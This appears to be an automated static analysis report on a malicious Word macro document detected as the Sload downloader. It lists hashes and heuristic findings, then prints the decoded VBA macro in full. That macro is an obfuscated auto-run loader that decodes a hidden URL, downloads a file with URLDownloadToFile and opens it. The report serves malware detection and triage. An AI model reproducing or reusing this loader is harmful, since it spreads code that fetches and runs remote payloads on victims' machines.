Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f48a49ebc424e129…

MALICIOUS

Office (OLE)

Size: 103.0 KB
Created: 2019-04-24 19:37:00
Authoring application: Microsoft Office Word
First seen: 2022-06-20
MD5: ef76df27958e55ee2511e9cf330f62b5
SHA-1: e24c5f2c523fe179cae36404ca69c2f90c4c205c
SHA-256: f48a49ebc424e1295d41e5f9ed9e690ae85c73d2a5d31cd5318c503ff254942a
Risk score: 360

Heuristics (11)

  • ClamAV: Doc.Downloader.Sload-6961205-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Sload-6961205-0
  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias _
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set vbPZRbJnFhs = CreateObject(ne9Bu6LldIl(3))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set vbPZRbJnFhs = CreateObject(ne9Bu6LldIl(3))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    FCFZfKhNrTrof3U = Environ(ne9Bu6LldIl(0)) + ne9Bu6LldIl(1)
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5626 bytes
SHA-256: d7dfa2b4df45f43b71142557051339c59f4762726053cbd8a34c9f3685423f99
Detection
ClamAV: No threats found
Obfuscation or payload: likely
63 of 120 identifiers look randomly generated (e.g. 'jQ6UjzGo4wjAd4fxBhe') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If 1 And VBA7 And Win64 And 1 And 1 And 1 Then
Private sH3nea3 As Integer
Private OymkIJPy2eVDXIdXu9 As Integer
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal LIvzZvNHXibkbdS As Long, _
ByVal lrSxpT1bu As String, _
ByVal nAXWfqEk9eIH7POrN As String, _
ByVal uhNH2slmQBZ As Long, _
ByVal rKh1B As Long) As LongPtr
Private POrbgTrbxK As Integer
Private AdS35RTEtWW7e As Integer
#Else
Private sH3nea3 As Integer
Private Wg5Ya As Integer
Private Declare Function URLDownloadToFile Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal LIvzZvNHXibkbdS As Long, _
ByVal lrSxpT1bu As String, _
ByVal nAXWfqEk9eIH7POrN As String, _
ByVal uhNH2slmQBZ As Long, _
ByVal rKh1B As Long) As Long
Private Declare Function InternetOpen Lib "wininet" Alias "InternetOpenA" (ByVal VpGdvwpW05ATpxfNt As String, ByVal VPJtA As Long, ByVal guuAAhrpkgvd5 As String, ByVal jQ6UjzGo4wjAd4fxBhe As String, ByVal EL9Mikl8eBKUXBswxn1 As Long) As Long
Private Declare Function InternetCloseHandle Lib "wininet" (ByVal fJcLbxB0XcBrZy As Long) As Integer
Private Declare Function InternetReadFile Lib "wininet" (ByVal GOjZ4 As Long, ByVal NjxqbdjSBz As String, ByVal l8hA92KczXOXkEVS As Long, JlVGm As Long) As Integer
Private Declare Function InternetOpenUrl Lib "wininet" Alias "InternetOpenUrlA" (ByVal JtPHhT0hrUz1mUU As Long, ByVal hPwvmk2fpzjK8J As String, ByVal yxuCcmokrKrbHftXj As String, ByVal S1ybLYK As Long, ByVal zNKDaIx8 As Long, ByVal rOtX5o9ifxYb4BS As Long) As Long
Private MlHGHJAidPZCFS As Integer


#End If
Sub Document_Open()
CIMcojGEeG
End Sub
Sub CIMcojGEeG()
Dim ZCGzrtTgL5W
Dim ne9Bu6LldIl
Dim FCFZfKhNrTrof3U As String
ne9Bu6LldIl = Array(ZaxZf1Hvb2i(PEwnsEgdsG4ih(TmRXNr1T3nFuE(), Mx2pUNwA9())), ZaxZf1Hvb2i("\T]<hDGLm-*=mW:0i-tZmv^n./eaeVewxajJe]J_"), ZaxZf1Hvb2i("hg`+t_`=t]aVp~f@so]]:NMc/lcG/JDZvlwxiv~Icl-toHEMm}v;c13)ljj>ev`5a-Phn01Ki=DCnOrggCeb.59aiJN?n8OVfPcXoF_X/Dt?lkqVo`dzgP3)i2V+nRlL/F\Yf\T9rtt(e9^Msrvdhi2}/PWsw4TSefxBd>-wsS|u.4~*e~gHx-v{eUN-"), ZaxZf1Hvb2i(bC3d7aI9(jd8iZSrCi(), kUgX40cz9BI())))
Dim vbPZRbJnFhs
Set vbPZRbJnFhs = CreateObject(ne9Bu6LldIl(3))
FCFZfKhNrTrof3U = Environ(ne9Bu6LldIl(0)) + ne9Bu6LldIl(1)
Call URLDownloadToFile(ZaxZf1Hvb2i(YxvbYDxW7(FOcnnk(), AkeM8fiNb())), ne9Bu6LldIl(2), FCFZfKhNrTrof3U, ZaxZf1Hvb2i(YxvbYDxW7(FOcnnk(), AkeM8fiNb())), ZaxZf1Hvb2i(YxvbYDxW7(FOcnnk(), AkeM8fiNb())))
vbPZRbJnFhs.Open (FCFZfKhNrTrof3U)
End Sub

Function ZaxZf1Hvb2i(TYIIhctT) As String
    Dim EmmYjinx3(1055) As Byte
    Dim jHD9yyE3vpU7QBj() As Byte
    Dim L3q9wO0snCXb5u85
    Dim r6QCKCQSd4kKrNzj
    jHD9yyE3vpU7QBj = StrConv(TYIIhctT, 128)
    For r6QCKCQSd4kKrNzj = 0 To UBound(jHD9yyE3vpU7QBj) - 1
        If (r6QCKCQSd4kKrNzj Mod 4 = 0) Then
            EmmYjinx3(L3q9wO0snCXb5u85) = jHD9yyE3vpU7QBj(r6QCKCQSd4kKrNzj)
            L3q9wO0snCXb5u85 = L3q9wO0snCXb5u85 + 1
        End If
    Next r6QCKCQSd4kKrNzj
    ZaxZf1Hvb2i = Left(StrConv(EmmYjinx3, 64), L3q9wO0snCXb5u85)
End Function

Function PEwnsEgdsG4ih(IJJemwGovxRI2gohfF8 As String, VbuF4n As String)
PEwnsEgdsG4ih = IJJemwGovxRI2gohfF8 + VbuF4n
End Function
Function bC3d7aI9(yEKSZaPp As String, Lyzr4qSIOKU9r As String)
bC3d7aI9 = yEKSZaPp + Lyzr4qSIOKU9r
End Function
Function YxvbYDxW7(Xgu1DWEwIO3EqnhwL As String, LN2TghpqbPfDDalv As String)
YxvbYDxW7 = Xgu1DWEwIO3EqnhwL + LN2TghpqbPfDDalv
End Function
Function qWKu2LDzk(wRYQQL3 As String, As3avcD2lM2y As String)
qWKu2LDzk = wRYQQL3 + As3avcD2lM2y
End Function
Function n8EGirdO5fXwp(CNrz5Ab7Yj5oIJtM9 As String, Wv0Jsbc6tEOMuqAbdpZ As String)
n8EGirdO5fXwp = CNrz5Ab7Yj5oIJtM9 + Wv0Jsbc6tEOMuqAbdpZ
End Function
Function TmRXNr1T3nFuE() As String
Dim b2Dgre1
Dim fjPQwQM89njc10yP
b2Dgre1 = "T,Ed"
fjPQwQM89njc10yP = b2Dgre1 & "E4+m"
TmRXNr1T3nFuE = fjPQwQM89njc10yP
End Function

Function Mx2pUNwA9() As String
Dim qOVref
Dim kDo02hSED4kSulU1H
qOVref = "M2=d"
kDo02hSED4kSulU1H = qOVref & "PJ,j"
Mx2pUNwA9 = kDo02hSED4kSulU1H
End Function

Function jd8iZSrCi() As String
Dim waW7lyic
Dim c33T8A
waW7lyic = "Skb^h2:?e4J}lV3Ul"
c33T8A = waW7lyic & "c6g.g-CA11Hpj[xpt"
jd8iZSrCi = c33T8A
End Function

Function kUgX40cz9BI() As String
Dim BP0jcM5S
Dim KVPwFVVN8M
BP0jcM5S = "NyljXkiZVXc@ymay7"
KVPwFVVN8M = BP0jcM5S & "/tMPRiST:o7Osn-I8"
kUgX40cz9BI = KVPwFVVN8M
End Function

Function FOcnnk() As String
Dim Ev38tdE5OQdOk5ujP
Dim VklPv
Ev38tdE5OQdOk5ujP = "0"
VklPv = Ev38tdE5OQdOk5ujP & "H"
FOcnnk = VklPv
End Function

Function AkeM8fiNb() As String
Dim q8CbM1S67g
Dim v7tFxuWNUWxfp
q8CbM1S67g = "@"
v7tFxuWNUWxfp = q8CbM1S67g & "y"
AkeM8fiNb = v7tFxuWNUWxfp
End Function

Function QJUCTUe() As String
Dim wkK2W60cN
Dim xJ4vwHH
wkK2W60cN = "0"
xJ4vwHH = wkK2W60cN & "H"
QJUCTUe = xJ4vwHH
End Function

Function tT88mVfI36Kv() As String
Dim DcHIwTdBflU
Dim yNGsxAI
DcHIwTdBflU = "@"
yNGsxAI = DcHIwTdBflU & "y"
tT88mVfI36Kv = yNGsxAI
End Function

Function Vjh7lH4H() As String
Dim Gq2zw
Dim C3XAaA2xE5HugMsS78N
Gq2zw = "0"
C3XAaA2xE5HugMsS78N = Gq2zw & "H"
Vjh7lH4H = C3XAaA2xE5HugMsS78N
End Function

Function BPXQDV2P() As String
Dim lb1F64LucgQFDgHCt
Dim vTaUiXjIzyGoQnj
lb1F64LucgQFDgHCt = "@"
vTaUiXjIzyGoQnj = lb1F64LucgQFDgHCt & "y"
BPXQDV2P = vTaUiXjIzyGoQnj
End Function